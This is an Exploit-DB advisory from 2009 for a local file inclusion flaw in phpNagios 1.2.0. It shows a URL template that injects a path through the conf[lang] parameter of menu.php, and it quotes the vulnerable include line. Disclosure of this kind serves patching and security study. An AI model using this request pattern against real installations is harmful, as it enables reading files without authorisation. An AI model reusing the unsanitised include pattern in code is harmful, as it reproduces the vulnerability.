phpNagios 1.2.0 menu.php Local File Inclusion Vulnerability

2009-09-09T00:00:00
ID EDB-ID:9611
Type exploitdb
Reporter CoBRa_21
Modified 2009-09-09T00:00:00

Description

phpNagios 1.2.0 (menu.php) Local File Inclusion Vulnerability. CVE-2009-4626. Webapps exploit for php platform

                                        
                                            -------------------------------------------------------------------------------------
phpNagios v 1.2.0 (menu.php) LFI Vulnerability
-------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu[at]windowslive[dot]com
 
Script Download: http://sourceforge.net/projects/phpnagios/
 
-------------------------------------------------------------------------------------
 
EXPLOÄ°T:
 
http://localhost/[PATH]/menu.php?conf[lang]= [LFÄ°]
 
-------------------------------------------------------------------------------------
 
BUG
Line 28:        include_once("lib/lang/".$conf['lang']."/menu.php");
 
-------------------------------------------------------------------------------------

# milw0rm.com [2009-09-09]